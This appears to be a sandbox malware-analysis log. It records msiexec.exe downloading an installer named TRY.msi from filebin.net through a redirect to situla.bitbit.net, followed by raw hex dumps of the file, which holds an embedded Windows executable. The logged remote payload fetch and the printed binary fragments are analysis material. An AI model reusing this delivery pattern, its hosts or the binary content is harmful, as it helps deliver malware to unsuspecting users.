                                                                  Apr 20, 2022 09:18:55.417620897 CEST8.8.8.8192.168.2.220x5d20No error (0)situla.bitbit.net87.238.33.7A (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:55.504235029 CEST8.8.8.8192.168.2.220x7edNo error (0)situla.bitbit.net87.238.33.7A (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:55.504235029 CEST8.8.8.8192.168.2.220x7edNo error (0)situla.bitbit.net87.238.33.8A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • filebin.net
                                                                  • situla.bitbit.net

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249173185.47.40.36443C:\Windows\System32\msiexec.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-04-20 07:18:55 UTC0OUTGET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Windows Installer
                                                                  Host: filebin.net
                                                                  2022-04-20 07:18:55 UTC0INHTTP/1.1 302 Found
                                                                  Cache-Control: max-age=0
                                                                  Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1
                                                                  X-Robots-Tag: noindex
                                                                  Date: Wed, 20 Apr 2022 07:18:55 GMT
                                                                  Content-Length: 0
                                                                  X-Varnish: 196823
                                                                  Age: 0
                                                                  Via: 1.1 varnish (Varnish/6.0)
                                                                  Access-Control-Allow-Origin: *
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.224917487.238.33.8443C:\Windows\System32\msiexec.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-04-20 07:18:55 UTC0OUTGET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Windows Installer
                                                                  Host: situla.bitbit.net
                                                                  2022-04-20 07:18:55 UTC1INHTTP/1.1 200 OK
                                                                  Content-Length: 491520
                                                                  Accept-Ranges: bytes
                                                                  Last-Modified: Wed, 20 Apr 2022 01:28:19 GMT
                                                                  ETag: "260bec1b34ce96e5ed6c42d51e7146fb"
                                                                  Cache-Control: max-age=30
                                                                  Content-Disposition: filename="TRY.msi"
                                                                  x-amz-request-id: tx000000000000000eebd7e-00625fb3df-3b49846f-default
                                                                  Content-Type: application/msword
                                                                  Date: Wed, 20 Apr 2022 07:18:55 GMT
                                                                  Connection: close
                                                                  2022-04-20 07:18:55 UTC1INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                  Data Ascii: >
                                                                  2022-04-20 07:18:55 UTC17INData Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 0c 02 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 28 01 00 00 03 00 00 00 90 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 0e 00 00 00 f0 00 00 00 0f 00 00 00 f8 00 00 00 12 00 00 00 ec 01 00 00 13 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 49 6e 73 74 61 6c 6c 65 72 00 00 00 1e 00 00 00 0b 00 00 00 49 6e 74 65 6c 3b 31 30 33 33 00 00 1e 00 00 00 27 00 00 00 7b 34 39 38 32 41 36 31 43 2d 39 34 36 44 2d 34 31 36 38 2d 38 30 39 43 2d 31 33 46 46 39 39
                                                                  Data Ascii: Oh+'0x(InstallerIntel;1033'{4982A61C-946D-4168-809C-13FF99
                                                                  2022-04-20 07:18:55 UTC33INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fe ae 1e ec ba cf 70 bf ba cf 70 bf ba cf 70 bf b3 b7 f4 bf fa cf 70 bf b3 b7 e5 bf af cf 70 bf b3 b7 f3 bf 2f cf 70 bf 9d 09 0b bf b5 cf 70 bf ba cf 71 bf 25 cf 70 bf b3 b7 fa bf b7 cf 70 bf b3 b7 e2 bf bb cf 70 bf b3 b7 e1 bf bb cf 70 bf 52 69 63 68 ba cf 70 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ee dc 2e 60 00 00 00
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ppppp/ppq%ppppRichpPEL.`
                                                                  2022-04-20 07:18:55 UTC49INData Raw: 50 83 ec 08 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 5d 08 e8 58 a1 00 00 8b f0 33 c0 89 75 ec 89 43 08 89 43 10 89 43 14 89 45 fc e8 3e b8 01 00 8b 7e 08 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 cc a1 00 00 83 c4 04 8b c8 8d 9b 00 00 00 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 08 e8 04 b8 01 00 bf 60 a6 02 10 8b c7 8d 50 01 90 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 8f a1 00 00 83 c4 04 8b c8 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 10 e8 cd b7 01 00 bf 68 a6 02 10 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 59 a1 00 00 83 c4 04 8b c8 8d 49 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 14 c7 45 fc ff ff ff ff e8 8d b7 01 00 8b 75 ec 8b 06 8a 08 88 4b 0c e8 7e b7 01 00 8b 56 04 8a
                                                                  Data Ascii: PSVW`3PEde]X3uCCCE>~P@u+pVvNAGC`P@u+pVvNAGChP@u+pVYIvNAGCEuK~V
                                                                  2022-04-20 07:18:55 UTC65INData Raw: e8 1b 81 ff ff 8b 45 ec 3b c3 74 07 50 ff 15 38 80 02 10 8b 45 e8 3b c3 74 08 53 50 ff 15 34 80 02 10 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b d1 8b 4a 04 83 79 f4 00 75 06 32 c0 8b e5 5d c3 e8 04 00 00 00 8b e5 5d c3 55 8b ec 6a ff 68 08 70 02 10 64 a1 00 00 00 00 50 83 ec 0c 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b fa b9 08 c1 02 10 e8 7a 01 00 00 8d 45 f0 50 8b cf e8 ff fe ff ff c7 45 fc 00 00 00 00 8b 75 f0 b9 08 c1 02 10 e8 5b 01 00 00 6a 04 68 08 c1 02 10 57 e8 0e f7 ff ff 6a 01 68 08 a9 02 10 57 e8 01 f7 ff ff 85 f6 75 04 33 c0 eb 18 8b c6 8d 50 02 8d 64 24 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 50 56 57 e8 d9 f6 ff ff 6a 01 68 04 c1 02 10 57
                                                                  Data Ascii: E;tP8E;tSP4MdY_^[]UJyu2]]UjhpdPSVW`3PEdzEPEu[jhWjhWu3Pd$ffu+PVWjhW
                                                                  2022-04-20 07:18:55 UTC81INData Raw: 00 00 80 e8 08 06 00 00 83 c4 10 c6 45 fc 03 8b 55 e8 83 7a f4 00 75 51 8b 45 ec 68 b4 c7 02 10 50 8d 4d e0 56 bb 40 00 00 00 51 8b d3 b9 02 00 00 80 e8 d9 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 04 e8 fa 82 ff ff c6 45 fc 03 8b 45 e0 83 c0 f0 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 75 4e 8b 55 ec 68 b4 c7 02 10 52 8d 45 dc 56 50 33 d2 b9 01 00 00 80 33 db e8 82 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 05 e8 a3 82 ff ff c6 45 fc 03 8b 45 dc 83 c0 f0 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 0f 84 89 01 00 00 8b 45 10 85 db 75 29 85 c0 75 13 8b 55 f0 53 52 68 01 00 00 80 8b de e8 07 0b 00 00 eb 3f 83 f8 01 75 3d 8b 45 ec 6a 00 50 68 01 00 00 80 eb 26 85 c0
                                                                  Data Ascii: EUzuQEhPMV@Q}EEEPIPBMyuNUhREVP33}EEEHJPBMyEu)uUSRh?u=EjPh&
                                                                  2022-04-20 07:18:55 UTC97INData Raw: 34 83 c0 10 6b c0 14 50 ff 35 7c 45 03 10 57 ff 35 14 2a 03 10 ff 15 68 81 02 10 3b c7 75 04 33 c0 eb 78 83 05 88 45 03 10 10 8b 35 78 45 03 10 a3 7c 45 03 10 6b f6 14 03 35 7c 45 03 10 68 c4 41 00 00 6a 08 ff 35 14 2a 03 10 ff 15 60 81 02 10 89 46 10 3b c7 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 64 81 02 10 89 46 0c 3b c7 75 12 ff 76 10 57 ff 35 14 2a 03 10 ff 15 24 81 02 10 eb 9b 83 4e 08 ff 89 3e 89 7e 04 ff 05 78 45 03 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 64 81 02 10 85 c0 75 08 83 c8 ff
                                                                  Data Ascii: 4kP5|EW5*h;u3xE5xE|Ek5|EhAj5*`F;tjh hWdF;uvW5*$N>~xEF_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWdu
                                                                  2022-04-20 07:18:55 UTC113INData Raw: ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 51 a3 ff ff 83 c4 14 83 c8 ff e9 06 02 00 00 66 39 30 74 db 53 8b 5d 10 3b de 74 0b 8b 03 3b c6 74 05 66 39 30 75 20 e8 6d b6 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 19 a3 ff ff 83 c4 14 83 c8 ff e9 cd 01 00 00 e8 4d b6 ff ff 8b 00 89 45 ec e8 43 b6 ff ff ff 75 14 89 30 53 ff 75 0c ff 75 08 e8 2c 02 00 00 83 c4 10 89 45 f4 83 f8 ff 0f 85 6f 01 00 00 e8 1e b6 ff ff 83 38 02 0f 85 61 01 00 00 6a 2f ff 75 0c e8 e0 77 00 00 59 59 85 c0 0f 85 4d 01 00 00 68 74 85 02 10 8d 45 fc 56 50 e8 30 05 00 00 83 c4 0c 3b c6 74 1b 83 f8 16 0f 85 2e 01 00 00 56 56 56 56 56 e8 6c a1 ff ff 83 c4 14 e9 1c 01 00 00 39 75 fc 0f 84 13 01 00 00 6a 02 bb 04 01 00 00 53 e8 96 10 00 00 8b f8 59 59 3b fe 0f 84 fa 00 00 00 68 03 01 00 00 57
                                                                  Data Ascii: VVVVVQf90tS];t;tf90u mVVVVVMECu0Suu,Eo8aj/uwYYMhtEVP0;t.VVVVVl9ujSYY;hW
                                                                  2022-04-20 07:18:55 UTC129INData Raw: 59 01 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 3b 71 04 74 7e 0f b6 70 04 0f b6 59 04 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 d9 03 00 00 0f b6 70 05 0f b6 59 05 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 b8 03 00 00 0f b6 70 06 0f b6 59 06 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 97 03 00 00 0f b6 70 07 0f b6 59 07 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 72 03 00 00 8b 70 08 3b 71 08 74 7e 0f b6 70 08 0f b6
                                                                  Data Ascii: Y+t3\HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~p
                                                                  2022-04-20 07:18:55 UTC145INData Raw: 38 5d fc 74 07 8b 4d f8 83 61 70 fd 5e 5f 5b c9 c3 8b ff 55 8b ec 53 57 33 ff 39 3d 74 2b 03 10 75 7d 8b 5d 08 3b df 75 1f e8 79 36 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 25 23 ff ff 83 c4 14 b8 ff ff ff 7f eb 69 8b 55 0c 3b d7 74 da 81 7d 10 ff ff ff 7f 77 d1 0f b7 03 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 0f b7 c8 0f b7 02 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 43 43 42 42 ff 4d 10 0f b7 c0 74 0a 66 3b cf 74 05 66 3b c8 74 c3 0f b7 d0 0f b7 c1 2b c2 eb 12 57 ff 75 10 ff 75 0c ff 75 08 e8 20 fe ff ff 83 c4 10 5f 5b 5d c3 8b ff 55 8b ec 51 51 53 56 8b 35 dc 2b 03 10 33 db 89 5d fc 8b 06 57 3b c3 74 50 8b 3d 90 80 02 10 53 53 6a ff 50 53 53 ff d7 89 45 f8 3b c3 74 41 6a 02 50 e8 95 90 ff ff 59 59 89 45 fc 3b c3 74 30 ff 75 f8 50 6a ff ff 36
                                                                  Data Ascii: 8]tMap^_[USW39=t+u}];uy6WWWWW%#iU;t}wfArfZw fArfZw CCBBMtf;tf;t+Wuuu _[]UQQSV5+3]W;tP=SSjPSSE;tAjPYYE;t0uPj6
                                                                  2022-04-20 07:18:55 UTC161INData Raw: 02 10 8b ff 55 8b ec 51 53 8b 45 0c 83 c0 0c 89 45 fc 64 8b 1d 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 66 1c 02 10 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 96 ff ff ff 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 96 0f 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 7b dc fe ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 59 0f 00 00 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec
                                                                  Data Ascii: UQSEEddE]mc[XY$UQQSVWd5uEfjuuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3{jVvvjuvuY ^]U
                                                                  2022-04-20 07:18:55 UTC177INData Raw: 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00 74 03 83 ce 01 a9 00 01 00 00 74 06 81 ce 00 00 08 00 8b c8 bb 00 60 00 00 23 cb 74 2a 81 f9 00 20 00 00 74 1c 81 f9 00 40 00 00 74 0c 3b cb 75 16 81 ce 00 03 00 00 eb 0e 81 ce 00 02 00 00 eb 06 81 ce 00 01 00 00 bf 40 80 00 00 23 c7 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ce 00 00 00 01 eb 0e 81 ce 00 00 00 03 eb 06 81 ce 00 00 00 02 8b 45 ec 8b d0 23 45 08 f7 d2 23 d6 0b d0 3b d6 75 07 8b c6 e9 b0 00 00 00 e8 16 fd ff ff 50 89 45 f4 e8 8a 02 00 00 59 0f ae 5d f4 8b 4d f4 33 d2 84 c9 79 03 6a 10 5a f7 c1 00 02 00 00 74 03 83 ca 08 f7 c1 00 04 00 00 74 03 83 ca 04 f7 c1 00 08 00 00 74 03 83 ca 02 f7 c1 00 10 00 00 74 03 83 ca 01 be 00 01 00 00 85 ce 74 06 81
                                                                  Data Ascii: tttt`#t* t@t;u@#@t-t@uE#E#;uPEY]M3yjZttttt
                                                                  2022-04-20 07:18:55 UTC193INData Raw: 50 9d 02 10 47 42 52 00 64 9c 02 10 47 42 52 00 54 9c 02 10 55 53 41 00 4c 9d 02 10 55 53 41 00 0c 0c 1a 0c 07 10 36 04 0c 08 2d 04 03 04 0c 10 10 08 1d 08 30 00 00 00 4f 43 50 00 41 43 50 00 4e 6f 72 77 65 67 69 61 6e 2d 4e 79 6e 6f 72 73 6b 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 00 00 00 00 47 65 74 50 72 6f 63 65 73 73 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 00 47 65 74 55 73 65 72 4f 62 6a 65 63 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00
                                                                  Data Ascii: PGBRdGBRTUSALUSA6-0OCPACPNorwegian-NynorskEEE00P('8PW700PP (`h`hhhxppwppSystemRootGetProcessWindowStationGetUserObjectInformationA
                                                                  2022-04-20 07:18:55 UTC209INData Raw: 00 00 00 00 01 00 00 00 0c e4 02 10 14 e4 02 10 00 00 00 00 58 22 03 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 fc e3 02 10 74 22 03 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c4 e3 02 10 00 00 00 00 d0 23 01 00 e4 80 01 00 68 ed 01 00 c5 1c 02 00 cf 1d 02 00 c8 5f 02 00 ee 5f 02 00 1c 60 02 00 49 60 02 00 6c 60 02 00 87 60 02 00 b0 60 02 00 d8 60 02 00 34 61 02 00 84 61 02 00 a0 61 02 00 cb 61 02 00 f8 61 02 00 28 62 02 00 58 62 02 00 c1 62 02 00 04 63 02 00 40 63 02 00 88 63 02 00 d0 63 02 00 18 64 02 00 4b 64 02 00 89 64 02 00 b8 64 02 00 e8 64 02 00 18 65 02 00 48 65 02 00 8b 65 02 00 c9 65 02 00 09 66 02 00 52 66 02 00 a1 66 02 00 e2 66 02 00 29 67 02 00 88 67 02 00 c8 67 02 00 f8 67 02 00 30 68 02 00 58 68 02
                                                                  Data Ascii: X"@t"@#h__`I`l````4aaaaa(bXbbc@cccdKddddeHeeefRfff)gggg0hXh
                                                                  2022-04-20 07:18:55 UTC225INData Raw: 00 00 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 04 bf c9 1b 8e 34 40 00 00 00 a1 ed cc ce 1b c2 d3 4e 40 20 f0 9e b5 70 2b a8 ad c5 9d 69 40 d0 5d fd 25 e5 1a 8e 4f 19 eb 83 40 71 96 d7 95 43 0e 05 8d 29 af 9e 40 f9 bf a0 44 ed 81 12 8f 81 82 b9 40 bf 3c d5 a6 cf ff 49 1f 78 c2 d3 40 6f c6 e0 8c e9 80 c9 47 ba 93 a8 41 bc 85 6b 55 27 39 8d f7 70 e0 7c 42 bc dd 8e de f9 9d fb eb 7e aa 51 43 a1 e6 76 e3 cc f2 29 2f 84 81 26 44 28 10 17 aa f8 ae 10 e3 c5 c4 fa 44 eb a7 d4 f3 f7 eb e1 4a 7a 95 cf 45 65 cc c7 91 0e a6 ae a0 19 e3 a3 46 0d 65 17 0c 75 81 86 75 76 c9 48 4d 58 42 e4 a7 93 39 3b 35 b8 b2 ed 53 4d a7 e5 5d 3d c5 5d 3b 8b 9e 92 5a ff 5d a6
                                                                  Data Ascii: P@$@@ @4@N@ p+i@]%O@qC)@D@<Ix@oGAkU'9p|B~QCv)/&D(DJzEeFeuuvHMXB9;5SM]=];Z]
                                                                  2022-04-20 07:18:55 UTC241INData Raw: 00 00 01 00 0d 00 30 30 10 00 01 00 04 00 68 06 00 00 d6 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 3e 07 00 00 18 18 10 00 01 00 04 00 e8 01 00 00 26 0a 00 00 10 10 10 00 01 00 04 00 28 01 00 00 0e 0c 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 0d 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 1b 00 00 18 18 00 00 01 00 08 00 c8 06 00 00 86 24 00 00 10 10 00 00 01 00 08 00 68 05 00 00 4e 2b 00 00 00 00 00 00 01 00 20 00 d2 d9 00 00 b6 30 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 88 0a 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 30 30 01 00 18 18 00 00 01 00 20 00 88 09 00 00 d8 40 01 00 10 10 00 00 01 00 20 00 68 04 00 00 60 4a 01 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: 00h >&(006 $hN+ 000 % 00 @ h`J(0`
                                                                  2022-04-20 07:18:55 UTC257INData Raw: 0a 03 09 51 15 00 00 ff 04 2c 35 42 40 2e 0a 0a 0a 03 09 0a 15 00 00 03 03 03 03 03 03 03 03 03 03 03 09 0a 15 00 00 00 04 06 06 06 06 06 06 09 09 09 09 0a 15 00 00 00 04 51 39 39 39 39 39 39 39 39 39 51 15 00 00 00 15 15 15 15 15 15 15 15 15 15 15 15 12 00 00 04 00 2a 13 13 13 13 13 13 13 13 13 3a 00 04 00 00 00 47 47 47 47 47 47 47 47 47 47 47 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 c0 01 00 00 c0 01 00 00 c0 01 00 00 a0 02 00 00 e0 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac 2c d9 7d df f7 39 e7 d4 d2 eb dd de 36 6f de bc 19 ce 0c 87 9b 44 91 22 47 a2
                                                                  Data Ascii: Q,5B@.Q999999999Q*:GGGGGGGGGGGPNGIHDR\rf IDATxy,}96oD"G
                                                                  2022-04-20 07:18:55 UTC273INData Raw: 24 5e e6 0a 37 c2 e2 59 30 46 0d 05 58 6d 9a e8 c4 2d 1b 4d 93 94 34 d5 18 0b 7b c7 2d 52 ed 12 4e 28 4f 21 90 08 2b 90 08 3c 2f 20 f4 7d 82 d0 c3 0f 14 be a7 86 29 a6 83 c0 73 06 d0 7a c5 2d 3d f5 9c 57 c2 1a 43 9c 24 a4 71 44 92 c4 1c b7 0f b1 46 43 d2 46 58 1f 21 2c 81 02 4f 42 e0 09 94 04 4f 81 12 16 25 41 65 be f9 22 08 49 38 db 43 ee b3 2f 83 dc 3d 45 ca 7a bd b0 36 f3 23 e4 28 96 80 1e 29 33 a2 06 d8 d1 77 38 ca 48 26 be b6 e2 9a d5 d4 ef ff 13 f4 c5 ff 1c 1d 3c 31 a5 f0 69 74 52 cd f8 76 a0 c7 22 12 70 de 19 ff b4 ce 6e 6d 6d c5 4a a9 21 03 00 46 c4 f9 dc f5 57 3e 9f eb fe d3 ac ba e3 6a 83 db b8 42 b2 75 e9 09 3c df 63 d0 eb 71 bc 7b c8 e6 a5 f3 54 2b 55 a2 38 21 d1 31 42 09 a4 ca 0c 5e 3e 66 2c 58 00 00 20 00 49 44 41 54 c6 a2 85 73 85 09 03 56
                                                                  Data Ascii: $^7Y0FXm-M4{-RN(O!+</ })sz-=WC$qDFCFX!,OBO%Ae"I8C/=Ez6#()3w8H&<1itRv"pnmmJ!FW>jBu<cq{T+U8!1B^>f,X IDATsV
                                                                  2022-04-20 07:18:55 UTC289INData Raw: 55 b0 00 9c 0f 85 58 4a 13 fc 77 13 b2 3b 5b e4 de 7e a5 5e d2 dc dd ac 40 9f f9 5b 66 ef 0a 8a dd 98 40 72 27 0e 59 66 ef 02 dd 45 08 dc 77 03 d1 7b c1 01 bc 4a 53 c2 97 4e 1a d1 da d5 75 1d b0 2a 7b 7e 79 db d0 c1 39 03 74 a3 f8 4a 1d 1d 1d 9d 3b 6b 1a 6b 1c eb f5 9a 2c cb 76 52 67 5d a6 e9 fa f9 69 59 a2 ee ef fb 6e 81 8b 02 48 f4 d6 0f bd f9 bd 8b 23 b2 9d 0f 7d 08 3a d7 e6 bd 67 bd 5e f3 ed 6f 7f 9b d5 6a c5 f3 e7 cf 19 8f c7 e4 59 86 2e 32 f2 a3 11 72 90 63 44 68 2d 96 67 90 8f 35 62 a0 29 ca 01 d2 87 1e 80 5a 6b ca b2 dc 39 bf ad 20 50 8a b2 1c 30 c8 0a 6a b1 0a 26 7e 27 f6 91 4e a8 bb 5d 97 c9 fb 50 dc 43 cb 76 ef c7 ee e3 4c 31 93 d4 99 c8 98 06 b3 5e 32 1c 54 64 3a c7 3a 87 b1 21 38 a7 62 5f c3 d4 35 28 59 65 ad 29 df c2 76 db 28 63 2b 2c fa cc
                                                                  Data Ascii: UXJw;[~^@[f@r'YfEw{JSNu*{~y9tJ;kk,vRg]iYnH#}:g^ojY.2rcDh-g5b)Zk9 P0j&~'N]PCvL1^2Td::!8b_5(Ye)v(c+,
